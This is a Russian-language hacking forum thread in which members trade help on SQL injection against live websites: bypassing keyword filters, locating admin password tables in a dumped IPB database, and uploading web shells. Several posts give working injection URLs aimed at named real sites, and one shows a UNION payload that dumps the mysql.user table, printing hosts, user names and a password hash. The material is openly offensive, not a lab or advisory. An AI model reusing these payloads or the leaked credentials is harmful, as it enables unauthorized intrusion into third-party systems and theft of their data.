Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Существуют варианты обойти фильтрацию WHERE в запросе? Фильтруется, походу, тупым поиском текста в запросе. Тоесть /*!%0DWhErE*/ и подобные вариации не помогают.
     
  2. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    :) если к примеру нжинкс стоит криво настроеный, то да.
     
  3. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    «нжинкс» не работает с .htaccess в принципе..
     
  4. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Невозможно найти удалённый сервер
     
  5. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Есть ли вариант обойти ORA-06502 ? character to number conversion error
    Реагирует так на кавычку или комментарий (--,--+ и т.д.).Часто встречал в движке такое.
    Реакция даже на пробелы( хз уже,что подставлять ).
     
  6. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    пробуй варианты ссылко
     
    _________________________
  7. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Вопрос такой:
    Кручу, кручу скулю, получаю БД.
    В основном все с приставкой ipb. Ну следовательно форум ipb, ищу пароль админа... не нахожу)
    там где-то сотня таблиц и найти не могу(
    подскажите ее название пожалуйста)
     
  8. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Увы, тип скули - стринг. Тоесть с кавычкой. А кавычки там слэшируются.


    Вообще интерестная скуль.

    http://girsa.ru/search/'1+order+by+100+--+


    http://girsa.ru/search/'%0D1%0Dorder%0Dby%0D100%0D--%0D


     
    #19508 Pirotexnik, 2 Mar 2012
    Last edited: 2 Mar 2012
    2 people like this.
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Осмелюсь предположить что ничего не выйдет, как я понял в скрипте не фильтруется только первый символ запроса, остальные фильтруются(?), т.е.:
    http://girsa.ru/search/'
    Получаем запрос: select gid from tags where tag = '\' or tag='\''
    где красным выделено, то что нарушает синтаксис запроса, обойти это увы у меня не вышло.
     
    _________________________
    2 people like this.
  10. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Expl0ited, можно как-то шелл залить на тот сайт?
     
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Подскажите как залить шелл, пробую так
    и не выходит, я может чтото делаю неправильно?
     
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Наверное, поэтому

    http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(mysql.user)where(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User,0x3a,Password,0x3a,File_priv))))x),3+from+mysql.user+--+


    localhost:forks::Y
    77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10EFC0CBD5FD:Y
     
    1 person likes this.
  13. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а я не шарю что ето значит, подскажи
     
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    ну, это значит что подключение к бд разрешено с определенных хостов
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    он будет иметь право для запеси в папки с правами 777, т.е где разрешены запеси для всех групп.
     
    _________________________
  17. georgich

    georgich New Member

    Joined:
    19 Jun 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Приветствую.
    Сканил Acunetix'ом один ресурс и он выдал мне следующее:
    И приводит запрос, который выдает 404 и 503 ошибку. Я пытался его воспроизвести, но у меня получилась только 404 ошибка.
    503-ю воспроизвести не могу. И интересует такой вопрос: насколько реально будет эксплуатировать данную уязвимость? Если вообще реально. Спасибо.
     
  18. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    1. там mq=on. Это делает невозможным заливку, потому что железно нужны кавычки.
    2. нельзя переводить в хекс методы, операторы и т.п.
     
    #19518 Melfis, 2 Mar 2012
    Last edited: 2 Mar 2012
    1 person likes this.
  19. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    реально бред :(
    это тоже значение не имеет, к бд обращается сам скрипт, уж у него права на подключение есть
    Melfis верно сказал :) Двойного запроса там тоже не видно, нужно другой способ искать, благо читалка там есть ;)
     
    1 person likes this.
  20. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Сейчас, специаьлно для тебя запустил apache & mysql, и специально написал php скрипт, через которй вводил комманды sql, при попытке создать файл в www выдает ошибку:
    Code:
    Can't create/write to file '/var/www/hello.txt' (Errcode: 13)
    И где бред??


    Это естественно.
     
    #19520 R0nin, 2 Mar 2012
    Last edited: 2 Mar 2012
Thread Status:
Not open for further replies.